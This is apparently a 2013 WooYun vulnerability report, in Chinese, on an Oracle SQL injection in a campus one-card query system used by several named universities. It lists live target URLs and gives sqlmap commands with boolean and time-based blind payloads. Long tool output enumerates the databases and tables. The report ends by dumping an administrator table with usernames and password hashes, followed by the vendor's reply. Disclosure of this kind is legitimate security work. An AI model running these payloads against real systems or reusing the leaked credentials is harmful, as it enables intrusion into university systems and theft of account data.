漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-042821
漏洞标题:某通用校园一卡通查询系统oracle注入
相关厂商:哈尔滨新中新电子股份有限公司
漏洞作者: 路人甲
提交时间:2013-11-14 11:20
修复时间:2014-02-12 11:20
公开时间:2014-02-12 11:20
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-14: 细节已通知厂商并且等待厂商处理中
2013-11-18: 厂商已经确认,细节仅向厂商公开
2013-11-21: 细节向第三方安全合作伙伴开放
2014-01-12: 细节向核心白帽子及相关领域专家公开
2014-01-22: 细节向普通白帽子公开
2014-02-01: 细节向实习白帽子公开
2014-02-12: 细节向公众公开
简要描述:
看到了以前有人在乌云提的漏洞,测试了下发现不行了,于是找了其他的可以注射的页面,这个算不算重复啊?
详细说明:
测试了几个学校,如,南开大学,山东大学,鲁东大学等等,都有存在,
http://ecard.nankai.edu.cn/getfjnr.action?fjid=8ae48a8a254e6f8101254ea07c2d0003
http://ecard.sdu.edu.cn/getfjnr.action?fjid=53d6b6923cff8518013f5f2b4b59000b
http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009
使用sqlmap跑一下,
$ ./sqlmap.py -u http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 --dbs --threads=10
---
Place: GET
Parameter: fbxxid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fbxxid=4a42b0f33606058601360b0eac3e0001' AND 5509=5509 AND 'wHAE'='wHAE
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fbxxid=4a42b0f33606058601360b0eac3e0001' AND 5921=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(86)||CHR(119)||CHR(81),5) AND 'MIyn'='MIyn
---
[10:05:35] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:25:12] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:25:12] [INFO] fetching database (schema) names
[10:25:12] [INFO] fetching number of databases
[10:25:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:25:12] [INFO] retrieved:
[10:25:16] [INFO] heuristics detected web page charset 'ISO-8859-2'
16
[10:26:33] [INFO] retrieved: CTXSYS
[10:31:52] [INFO] retrieved: DBSNMP
[10:38:03] [INFO] retrieved: DMSYS
[10:43:20] [INFO] retrieved: EXFSYS
[10:48:51] [INFO] retrieved: IDDBUSER
[10:56:14] [INFO] retrieved: MDSYS
[11:01:27] [INFO] retrieved: OLAPSYS
[11:09:45] [INFO] retrieved: ORDSYS
[11:17:23] [INFO] retrieved: OUTLN
[11:23:48] [INFO] retrieved: SCHOOL
[11:29:42] [INFO] retrieved: SYS
[11:32:43] [INFO] retrieved: SYSMAN
[11:38:29] [INFO] retrieved: SYSTEM
[11:44:00] [INFO] retrieved: TSMSYS
[11:50:12] [INFO] retrieved: WMSYS
[11:55:51] [INFO] retrieved: XDB
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] IDDBUSER
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCHOOL
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
$ ./sqlmap.py -u http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 -D SCHOOL --tables --threads=10
---
Place: GET
Parameter: fjid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fjid=4a42b0f33381c4f90133d498614e0009' AND 5975=5975 AND 'wecX'='wecX
---
[12:00:50] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:00:50] [INFO] fetching tables for database: 'SCHOOL'
[12:00:50] [INFO] fetching number of tables for database 'SCHOOL'
[12:00:50] [INFO] retrieved:
[12:00:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
112
[12:02:36] [INFO] retrieving the length of query output
[12:02:36] [INFO] retrieved: 10
[12:06:06] [INFO] retrieved: IBIB"__HJH 9/10 (90%)
[12:06:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[12:06:41] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[12:06:56] [INFO] retrieved: IBIB"_PHJH
[12:06:56] [INFO] retrieving the length of query output
[12:06:56] [INFO] retrieved: 12
[12:11:07] [INFO] retrieved: BATEWADRDBRB
[12:11:07] [INFO] retrieving the length of query output
[12:11:07] [INFO] retrieved: 13
[12:16:33] [INFO] retrieved: FARBRAXXPBDQX
[12:16:33] [INFO] retrieving the length of query output
[12:16:33] [INFO] retrieved: 13
[12:22:19] [INFO] retrieved: BAREWAYTLI@@K
[12:22:19] [INFO] retrieving the length of query output
[12:22:19] [INFO] retrieved: 11
[12:25:57] [INFO] retrieved: GATETAX_NOS
[12:25:57] [INFO] retrieving the length of query output
[12:25:57] [INFO] retrieved: 5
[12:29:07] [INFO] retrieved: GTRJN
[12:29:07] [INFO] retrieving the length of query output
[12:29:07] [INFO] retrieved: 10
[12:32:57] [INFO] retrieved: HISACCOUNT
[12:32:57] [INFO] retrieving the length of query output
[12:32:57] [INFO] retrieved: 13
[12:38:01] [INFO] retrieved: MLOG$_ACCOUNT
[12:38:01] [INFO] retrieving the length of query output
[12:38:01] [INFO] retrieved: 13
[12:42:20] [INFO] retrieved: MLOG$_MERCACC
[12:42:20] [INFO] retrieving the length of query output
[12:42:20] [INFO] retrieved: 8
[12:46:47] [INFO] retrieved: _PE_INF_ 5/8 (63%)
[12:47:53] [INFO] retrieved: OPENINFO
[12:47:53] [INFO] retrieving the length of query output
[12:47:53] [INFO] retrieved: 8
[12:52:09] [INFO] retrieved: OPERATOR
[12:52:09] [INFO] retrieving the length of query output
[12:52:09] [INFO] retrieved: 15
[12:57:49] [INFO] retrieved: OPERFEEITEM_OLD
[12:57:49] [INFO] retrieving the length of query output
[12:57:49] [INFO] retrieved: 7
[13:01:26] [INFO] retrieved: OPERLOG
[13:01:26] [INFO] retrieving the length of query output
[13:01:26] [INFO] retrieved: 8
[13:04:46] [INFO] retrieved: OPERPART
[13:04:46] [INFO] retrieving the length of query output
[13:04:46] [INFO] retrieved: 7
[13:07:20] [INFO] retrieved: HISTRJN
[13:07:20] [INFO] retrieving the length of query output
[13:07:20] [INFO] retrieved: 5
[13:10:15] [INFO] retrieved: UTRJN
[13:10:15] [INFO] retrieving the length of query output
[13:10:15] [INFO] retrieved: 13
[13:15:51] [INFO] retrieved: WEBTRJNREPORT
[13:15:51] [INFO] retrieving the length of query output
[13:15:51] [INFO] retrieved: 18
[13:21:32] [INFO] retrieved: WEB_COMPARE_RESULT
[13:21:32] [INFO] retrieving the length of query output
[13:21:32] [INFO] retrieved: 9
[13:24:36] [INFO] retrieved: _EB_FB___ 4/9 (44%)
[13:24:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:26:24] [INFO] retrieved: WEB_FBXXB
[13:26:24] [INFO] retrieving the length of query output
[13:26:24] [INFO] retrieved: 8
[13:29:12] [INFO] retrieved: WEB_FTPB
[13:29:12] [INFO] retrieving the length of query output
[13:29:12] [INFO] retrieved: 8
[13:31:46] [INFO] retrieved: WEB____J 4/8 (50%)
[13:31:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:32:14] [INFO] retrieved: WEB_XXFJ
[13:32:14] [INFO] retrieving the length of query output
[13:32:14] [INFO] retrieved: 8
[13:34:45] [INFO] retrieved: WEB_XXLM
[13:34:45] [INFO] retrieving the length of query output
[13:34:45] [INFO] retrieved: 12
[13:37:40] [INFO] retrieved: W_OP_MERCACC
[13:37:40] [INFO] retrieving the length of query output
[13:37:40] [INFO] retrieved: 8
[13:40:29] [INFO] retrieved: HISGTRJN
[13:40:29] [INFO] retrieving the length of query output
[13:40:29] [INFO] retrieved: 14
[13:44:15] [INFO] retrieved: W_OP_ORDERINFO
[13:44:15] [INFO] retrieving the length of query output
[13:44:15] [INFO] retrieved: 15
[13:47:41] [INFO] retrieved: W_THIRD_MESSAGE
[13:47:41] [INFO] retrieving the length of query output
[13:47:41] [INFO] retrieved: 5
[13:50:10] [INFO] retrieved: XFZKL
[13:50:10] [INFO] retrieving the length of query output
[13:50:10] [INFO] retrieved: 4
[13:50:55] [INFO] retrieved: ____
[13:51:37] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:52:45] [INFO] retrieved: ZBHD
[13:52:45] [INFO] retrieving the length of query output
[13:52:45] [INFO] retrieved: 2
[13:55:18] [INFO] retrieved: ZH
[13:55:18] [INFO] retrieving the length of query output
[13:55:18] [INFO] retrieved: 6
[13:57:46] [INFO] retrieved: ZKZYDY
[13:57:46] [INFO] retrieving the length of query output
[13:57:46] [INFO] retrieved: 6
[13:58:54] [INFO] retrieved: ______
[13:59:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[14:00:35] [INFO] retrieved: ZXYHKK
[14:00:35] [INFO] retrieving the length of query output
[14:00:35] [INFO] retrieved: 4
[14:02:19] [INFO] retrieved: KMRJ
[14:02:19] [INFO] retrieving the length of query output
[14:02:19] [INFO] retrieved: 3
[14:04:36] [INFO] retrieved: LOG
[14:04:36] [INFO] retrieving the length of query output
[14:04:36] [INFO] retrieved: 5
[14:06:45] [INFO] retrieved: LSHZB
[14:06:45] [INFO] retrieving the length of query output
[14:06:45] [INFO] retrieved: 7
[14:08:45] [INFO] retrieved: MERCACC
[14:08:45] [INFO] retrieving the length of query output
[14:08:45] [INFO] retrieved: 7
[14:10:52] [INFO] retrieved: MESSAGE
[14:10:52] [INFO] retrieving the length of query output
[14:10:52] [INFO] retrieved: 8
[14:13:13] [INFO] retrieved: MHISTRJN
[14:13:13] [INFO] retrieving the length of query output
[14:13:13] [INFO] retrieved: 5
[14:15:16] [INFO] retrieved: NTRJN
[14:15:16] [INFO] retrieving the length of query output
[14:15:16] [INFO] retrieved: 11
[14:17:56] [INFO] retrieved: OPERFEEITEM
[14:17:56] [INFO] retrieving the length of query output
[14:17:56] [INFO] retrieved: 8
[14:20:17] [INFO] retrieved: OPERTEAM
[14:20:17] [INFO] retrieving the length of query output
[14:20:17] [INFO] retrieved: 11
[14:23:02] [INFO] retrieved: PURSECONFIG
[14:23:02] [INFO] retrieving the length of query output
[14:23:02] [INFO] retrieved: 4
[14:24:26] [INFO] retrieved: QQAA
...
表有点多,就没继续跑下去了
漏洞证明:
其中,IDDBUSER和SCHOOL这两个库是一卡通比较重要的两个库,我这里选了IDDBUSER中的M_MANAGER表,
Database: IDDBUSER
Table: N_MANAGER
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| ID | NUMBER |
| PASSWD | VARCHAR2 |
| STATUS | VARCHAR2 |
| UNITNAME | VARCHAR2 |
| USERNAME | VARCHAR2 |
+----------+----------+
这是网站管理员的用户名跟密码,我没查到hash值。。。但是密码不能超过6位,应该比较容易破。
Database: IDDBUSER
Table: N_MANAGER
[5 entries]
+------------------+------------+
| PASSWD | USERNAME |
+------------------+------------+
| F41A476D82451862 | WEBMANAGER |
| F41A476D82451862 | sdxxb |
| C51D59C23143C4D9 | mll |
| A6CF2E03D025DB06 | zhy |
| NULL | NULL |
+------------------+------------+
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2013-11-18 22:06
厂商回复:
该漏洞已经在今年初就有白帽子提交,CNVD对所述案例进行了复现,并转报给教育网相关应急组织。
最新状态:
暂无